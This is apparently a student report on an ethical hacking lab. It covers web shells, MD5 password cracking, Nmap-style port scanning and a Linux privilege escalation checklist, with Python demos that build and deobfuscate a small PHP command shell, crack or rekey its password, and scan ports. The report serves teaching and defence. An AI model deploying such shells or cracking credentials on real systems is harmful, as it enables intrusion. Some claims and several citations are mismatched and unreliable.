Report On Ethical Hacking And Defense Using Case Study
Web Shells and Their Uses
The main objective of this project is to produce a report on ethical hacking and defence for the given case study. The areas covered by the report are as follows. The user is required to penetrate the given system and obtain root-level privileges. The project is divided into five flags: the first flag requires examining the content of the web server to determine the admin username and password; the second flag requires an understanding of web shells; the third flag requires cracking a password; the fourth flag requires determining which user entered a wrong password on the system, and here a TCP port scanner is used; the fifth flag requires learning basic Linux privilege escalation. The report also describes the methodology and the testing log.
Here, the user is required to install a virtual machine and then install the provided case study image on it. The process is demonstrated below ("An Introduction to Web-shells | Acunetix", 2018).
A web server stores the content of a site as HTML documents together with the resources they refer to, such as fonts, images, videos, JavaScript files and CSS stylesheets. These files could be kept on a personal computer, but it is far more practical to keep them all on a dedicated web server that runs continuously, is permanently connected to the Internet, keeps the same IP address and is hosted by a third-party provider ("Basic Linux Privilege Escalation", 2018).
In cybercrime, web shells are generally an overlooked factor; they do not attract the level of attention given to phishing or malware. Yet well-engineered web shells now provide polished and sophisticated toolkits for a variety of crimes, including password cracking, DDoS, privilege escalation, phishing, network reconnaissance and spamming. These functions are not only offered through a web-based user interface; the shells also accept commands from a botnet. With a single click, many shells can create a botnet, launching standalone processes that either connect to a command-and-control server or listen for commands on an unencrypted TCP connection. Some let the operator run port scans to find potentially exploitable services, while others let fraudsters schedule denial-of-service (DoS) attacks. There are shells dedicated to sending bulk spam, testing stolen credentials against well-known websites (for example PayPal and Amazon), cracking passwords and automatically defacing websites. With so many powerful features available, it is unsurprising that web shells are popular with cyber criminals.

A web shell is a malicious script used by an attacker with the intention of escalating and maintaining persistent access on an already compromised web application. A web shell cannot attack or exploit a remote vulnerability on its own, so it is always the second step of an attack: the attacker first has to exploit an existing vulnerability in the application in order to place the shell on the server (Bock, 2016).
Types of Attacks Using Web Shells
A web shell (or backdoor) can connect to a C&C server from which it receives instructions on which commands to execute. This setup is typically used in DDoS attacks, which require large amounts of bandwidth. In this case the attacker has no interest in damaging or stealing anything from the system on which the web shell was deployed; they simply use its resources whenever they are needed (Cengage Learning, 2017).
Launching and Pivoting Attacks
A web shell can be used to pivot inside or outside the network. The attacker may want to monitor network traffic on the system, scan the internal network to discover live hosts, and enumerate firewalls and routers within the network. This process can take days or even months, usually because the attacker tries to stay under the radar and draw as little attention as possible. Once the attacker has persistent access, they can make their moves at leisure ("Circumventing authentication of a webshell", 2018).
Persistent Remote Access
A web shell usually contains a backdoor which allows an attacker to remotely access and possibly control a server at any time. This saves the attacker the trouble of exploiting a vulnerability each time access to the compromised server is required. An attacker may also fix the vulnerability themselves, in order to ensure that nobody else will exploit it. In this way the attacker can stay under the radar and avoid any interaction with an administrator, while still obtaining the same result.
Escalation of Privileges
Unless the server is misconfigured, the web shell runs under the web server's own user account, whose permissions are limited. Using the web shell, the attacker may attempt privilege escalation attacks, exploiting local vulnerabilities on the system to assume root privileges, which on Linux and other UNIX-based operating systems is the 'super-user' account.
With access to the root account, the attacker can do anything on the system: install software, change permissions, add or remove users, steal passwords, read emails and so on.
When a website is hacked, the attacker routinely leaves behind a backdoor or web shell in order to regain access to the site later. These are often obfuscated to avoid detection, and require authentication so that only the attacker can use them. This section deobfuscates a web shell and shows how its authentication can be bypassed when you have the source code but not the password (Engebretson, 2013).
Privilege Escalation
Deobfuscating the web shell
preg_replace takes three arguments: the regular expression, the replacement and the subject. Because the regular expression carries the e modifier, PHP evaluates the replacement as PHP code after the substitution, so an arbitrary string can be executed. (The e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so shells built this way only run on old PHP versions.) This results in the following code ("What are web shells – Tutorial", 2018):
Manually converting this string would be a fair amount of work, so we let PHP do it:
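The PHP snippets this section refers to are not reproduced in the report. As an added example (not the report's code, nor the code of the post it draws on), the Python script below performs the same peeling statically, without ever running the shell: it resolves hex escapes in PHP double-quoted strings, treats the replacement of a preg_replace with the e modifier as the next stage of code, and inverts eval(...) chains of base64_decode, gzinflate, gzuncompress, str_rot13 and strrev. The sample shell is constructed inside the script so that it runs offline; its $auth_pass value is the first hash quoted later in the report.

```python
"""Static peeling of a layered PHP web shell (added example; no PHP executed)."""
import base64
import codecs
import re
import zlib

# Constructed innermost payload: a minimal password-gated command shell.
INNER = (
    '<?php\n'
    '$auth_pass = "64a113a4ccc22cffb9d2f75b8c19e333";\n'
    'if (md5($_POST["pass"]) !== $auth_pass) { die("403"); }\n'
    'system($_POST["cmd"]);\n'
)


def _gzdeflate(data: bytes) -> bytes:
    """Raw DEFLATE stream, the format PHP's gzdeflate() writes and gzinflate() reads."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def build_sample() -> str:
    """Wrap INNER the way shell authors do (constructed for the demo)."""
    blob = base64.b64encode(_gzdeflate(codecs.encode(INNER, "rot13").encode())).decode()
    hidden_eval = r"\x65\x76\x61\x6c"  # "eval" spelled with hex escapes to dodge grep
    return ('<?php preg_replace("/.*/e", '
            '"%s(str_rot13(gzinflate(base64_decode(\'%s\'))));", ".");'
            % (hidden_eval, blob))


def php_unescape(src: str) -> str:
    """Resolve \\xHH and \\NNN escapes that PHP applies to double-quoted strings."""
    src = re.sub(r"\\x([0-9a-fA-F]{1,2})", lambda m: chr(int(m.group(1), 16)), src)
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), src)


# Inverse of each wrapper function the shell applied on the way in.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# eval(f1(f2(...("literal")))): group 1 is the call chain, group 2 the literal.
EVAL_CHAIN = re.compile(r'eval\s*\(\s*((?:\w+\s*\(\s*)+)["\']([^"\']*)["\']\s*\)+\s*;?')
# preg_replace("/.../e", "<code>", ...): with the e modifier the replacement is executed.
PREG_E = re.compile(r'preg_replace\s*\(\s*"/[^"]*/[a-z]*e[a-z]*"\s*,\s*"((?:[^"\\]|\\.)*)"')


def peel_once(src: str):
    """Return the next layer of code, or None when no wrapper is left."""
    src = php_unescape(src)
    m = PREG_E.search(src)
    if m:
        return m.group(1)  # the replacement string is the next stage
    m = EVAL_CHAIN.search(src)
    if not m:
        return None
    data = m.group(2).encode("latin-1")
    for name in reversed(re.findall(r"\w+", m.group(1))):  # innermost call first
        data = DECODERS[name](data)
    return data.decode("latin-1")


def deobfuscate(src: str, max_layers: int = 20) -> list:
    """Peel layers until plain code remains; returns every stage, outermost first."""
    layers = [src]
    while len(layers) <= max_layers:
        nxt = peel_once(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


if __name__ == "__main__":
    for i, stage in enumerate(deobfuscate(build_sample())):
        print(f"--- layer {i} ---\n{stage[:120]}")
```

Peeling statically rather than replacing eval with echo and running the shell under PHP is safer: the outer layers sometimes contain side effects (mailing the URL to the attacker, re-infecting other files) that execute before the echo is reached.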
Bypassing the check
The $auth_pass at the top of the main code suggested that the web shell has an authentication check. The format of $auth_pass, 32 hexadecimal characters, suggests that it is an MD5 hash of the plaintext password. Since the source of the web shell is available, it is possible to do the following (Ethical hacking and countermeasures, 2017):
Crack a few passwords:

Hash                                Password
64a113a4ccc22cffb9d2f75b8c19e333    cmonqwe123#@!
9e4bf26d87b7e8b6b66b0a2305f67184    lex1312
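As an added example (not the report's code), the Python below implements both ways of getting past the check: a dictionary attack with a small mangling rule set against the MD5 in $auth_pass, and, when the hash does not crack, rewriting $auth_pass in the source with the hash of a password you choose, which works because the check compares against whatever is in the file. The wordlist and shell source are constructed for the demo; the hash in the sample shell is computed from one of the plaintexts the report lists rather than copied from the table, so the script is self-consistent offline.

```python
"""Recover or replace the MD5 $auth_pass of a PHP web shell (added example)."""
import hashlib
import re
from typing import Iterable, Optional

# Constructed mini wordlist containing the two plaintexts the report lists.
WORDLIST = ["password", "admin123", "lex1312", "letmein", "cmonqwe123#@!"]

# Matches the assignment `$auth_pass = "<32 hex chars>"` in shell source.
AUTH_PASS = re.compile(r'(\$auth_pass\s*=\s*["\'])([0-9a-fA-F]{32})(["\'])')


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


# Constructed shell source; the hash is md5("lex1312") so the demo is consistent.
SHELL_SRC = (
    '<?php $auth_pass = "%s";\n'
    'if (md5($_POST["pass"]) !== $auth_pass) die();\n'
    'system($_POST["cmd"]);' % md5_hex("lex1312")
)


def extract_hash(shell_src: str) -> Optional[str]:
    m = AUTH_PASS.search(shell_src)
    return m.group(2).lower() if m else None


def mangle(word: str) -> Iterable[str]:
    """Cheap rule set: the word itself, capitalised, and with common suffixes."""
    yield word
    yield word.capitalize()
    for suffix in ("1", "123", "!", "2018"):
        yield word + suffix


def crack_md5(target: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: hash each candidate and compare with the target hash."""
    target = target.lower()
    for base in wordlist:
        for cand in mangle(base.rstrip("\n")):
            if md5_hex(cand) == target:
                return cand
    return None


def rekey_shell(shell_src: str, new_password: str) -> str:
    """If cracking fails but the file is writable, swap in a hash you know."""
    new_hash = md5_hex(new_password)
    src, n = AUTH_PASS.subn(lambda m: m.group(1) + new_hash + m.group(3), shell_src)
    if n == 0:
        raise ValueError("no $auth_pass assignment found")
    return src


if __name__ == "__main__":
    h = extract_hash(SHELL_SRC)
    print("hash in shell:", h)
    print("cracked:", crack_md5(h, WORDLIST))
    print(rekey_shell(SHELL_SRC, "my-new-pass")[:60])
```

For a real wordlist such as rockyou.txt this loop is far slower than hashcat (mode 0 is raw MD5), but it shows the logic: unsalted MD5 over a short human password is a lookup, not a cryptographic obstacle. Rekeying, on the other hand, changes the file on disk and will be noticed by anyone comparing hashes of the site's files, so on an engagement it should be agreed with the client first.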
Port scanning is a technique used to determine whether a port on the target is open or closed; a port is open when a service uses it to communicate with other systems. This is why, when a port is open, it is eventually possible to identify what kind of service is using it by sending specially crafted packets to the target. Once we know the target IP address we can launch the port scan. When no option is selected and Nmap has raw-packet privileges, it runs a TCP SYN scan, also called a stealth scan ("Port Scanning with Nmap", 2018). Although this is the default, the -sS parameter can be used to request it explicitly, followed by the target's IP address ("TCP Port Scan with Nmap |", 2018):
TCP connect scan (-sT) is the default TCP scan type when SYN scan is not an option. This is the case when the user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. This is the same high-level system call that web browsers, P2P clients and most other network-enabled applications use to establish a connection. It is part of a programming interface known as the Berkeley Sockets API. Rather than reading raw packet responses off the wire, Nmap uses this API to obtain status information on each connection attempt. Because the full three-way handshake is completed, a connect scan is slower and noisier than a SYN scan: the service on the target sees an established connection and may log it.
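To make the difference concrete, the following is an added example (Python, not nmap's code and not part of the report) of a connect scan built directly on the Berkeley sockets API: a completed connect() means open, a reset (ECONNREFUSED) means closed, and a timeout or ICMP unreachable error means filtered, which is exactly how nmap -sT classifies ports. The listener helper exists only so the script can be run offline against itself.

```python
"""TCP connect scan on the Berkeley sockets API (added example, not nmap)."""
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host: str, port: int, timeout: float = 1.0) -> str:
    """Classify one port the way a connect scan does."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))  # full three-way handshake: the target service sees this
        return "open"
    except ConnectionRefusedError:  # RST came back
        return "closed"
    except OSError:  # timeout (socket.timeout is an OSError) or ICMP unreachable
        return "filtered"
    finally:
        s.close()


def grab_banner(host: str, port: int, timeout: float = 1.0) -> str:
    """Read whatever the service volunteers after connecting (SSH, SMTP, FTP talk first)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(256).decode(errors="replace").strip()
        except OSError:
            return ""


def tcp_connect_scan(host: str, ports, workers: int = 50) -> dict:
    """Scan ports concurrently; returns {port: "open" | "closed" | "filtered"}."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as ex:
        return dict(zip(ports, ex.map(lambda p: probe(host, p), ports)))


def open_local_listener(host: str = "127.0.0.1") -> tuple:
    """Throwaway listener on an ephemeral port so the scan has a known open port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    srv, port = open_local_listener()
    results = tcp_connect_scan("127.0.0.1", [port, 1, 22, 80, 443])
    for p, state in sorted(results.items()):
        print(f"{p:>5}/tcp  {state}")
    srv.close()
```

A SYN scan would instead send a single raw SYN and read the SYN/ACK or RST off the wire without completing the handshake, which is why it needs raw-socket privileges (root, or CAP_NET_RAW) and why it is quieter: most services never learn the connection was attempted.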
In the fifth flag, basic Linux privilege escalation is learnt, following the enumeration checklist areas Operating System, Applications & Services, Communications & Networking, Confidential Information & Users, File Systems, and Preparation & Finding Exploit Code ("UDP Port Scan with Nmap |", 2018).
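As an added example (not the report's code), the Python below automates the parts of that checklist that can be exercised offline: under Confidential Information & Users it lists every UID 0 account and every account with an interactive shell from passwd-format text; under File Systems and Applications & Services it walks a directory tree for setuid binaries and world-writable files, the classic escalation vectors when such a binary is unusual or a root cron job executes a writable script. The passwd excerpt and the file tree are constructed for the demo; on a real box the functions would be pointed at /etc/passwd and /.

```python
"""Pieces of a basic Linux privilege-escalation checklist (added example)."""
import os
import stat
import tempfile

# Constructed /etc/passwd excerpt. "toor" is the classic planted backdoor: a second UID 0.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
toor:x:0:0::/root:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""


def parse_passwd(text: str):
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) >= 7:
            yield {"name": f[0], "uid": int(f[2]), "gid": int(f[3]), "home": f[5], "shell": f[6]}


def uid0_accounts(text: str) -> list:
    """Anything besides root here is worth explaining."""
    return [u["name"] for u in parse_passwd(text) if u["uid"] == 0]


def login_accounts(text: str) -> list:
    """Accounts that can actually log in: password-spraying and su targets."""
    return [u["name"] for u in parse_passwd(text)
            if not u["shell"].endswith(("nologin", "false"))]


def _regular_files(root: str):
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)  # lstat: do not follow symlinks planted to mislead
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield p, st.st_mode


def find_setuid(root: str) -> list:
    """Equivalent of: find / -perm -4000 -type f 2>/dev/null"""
    return sorted(p for p, m in _regular_files(root) if m & stat.S_ISUID)


def world_writable(root: str) -> list:
    """Equivalent of: find / -perm -o+w -type f 2>/dev/null"""
    return sorted(p for p, m in _regular_files(root) if m & stat.S_IWOTH)


def build_demo_tree() -> dict:
    """Constructed tree standing in for / so the checks run offline."""
    root = tempfile.mkdtemp(prefix="privesc-demo-")
    os.makedirs(os.path.join(root, "usr/bin"))
    os.makedirs(os.path.join(root, "etc/cron.d"))
    suid = os.path.join(root, "usr/bin/backup-helper")
    ww = os.path.join(root, "etc/cron.d/nightly")
    plain = os.path.join(root, "usr/bin/ls")
    for p in (suid, ww, plain):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(plain, 0o755)
    os.chmod(ww, 0o666)
    os.chmod(suid, 0o4755)
    # Some filesystems refuse the setuid bit; report what actually stuck.
    suid_set = bool(os.lstat(suid).st_mode & stat.S_ISUID)
    return {"root": root, "suid": suid if suid_set else None, "world_writable": ww}


if __name__ == "__main__":
    print("UID 0 accounts:", uid0_accounts(SAMPLE_PASSWD))
    print("Interactive accounts:", login_accounts(SAMPLE_PASSWD))
    tree = build_demo_tree()
    print("setuid files:", find_setuid(tree["root"]))
    print("world-writable files:", world_writable(tree["root"]))
```

The remaining checklist areas (kernel and package versions under Operating System, listening services and routes under Communications & Networking, matching versions to exploit code under Preparation & Finding Exploit Code) depend on live commands such as uname -a, ss -lntp and the distribution's package manager, so they are not reproduced here.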
The primary objective of this project was to produce a report on ethical hacking and defence for the given case study. The user was required to penetrate the given system and obtain root-level privileges, and the project was divided into five flags. From the discussion it is observed that the first flag successfully surveyed the web server content to determine the admin username and password; the second flag covered web shells; the third flag successfully cracked the password; the fourth flag successfully determined which user entered a wrong password on the system, with the help of a TCP port scanner; and the fifth flag covered basic Linux privilege escalation. In future, passwords could also be attacked with the ncrack tool, which provides an effective facility for cracking network authentication.
An Introduction to Web-shells | Acunetix. (2018). Retrieved from
Basic Linux Privilege Escalation. (2018). Retrieved from
Bock. (2016). Ethical Hacking: Overview. [Carpinteria, Calif.]:
Cengage Learning. (2017). Ethical hacking and countermeasures. Boston, MA.
Circumventing authentication of a webshell. (2018). Retrieved from
Engebretson, P. (2013). The basics of hacking and penetration testing. Waltham, MA: Syngress/Elsevier.
Port Scanning with Nmap. (2018). Retrieved from
TCP Port Scan with Nmap | (2018). Retrieved from
UDP Port Scan with Nmap | (2018). Retrieved from
What are web shells – Tutorial. (2018). Retrieved from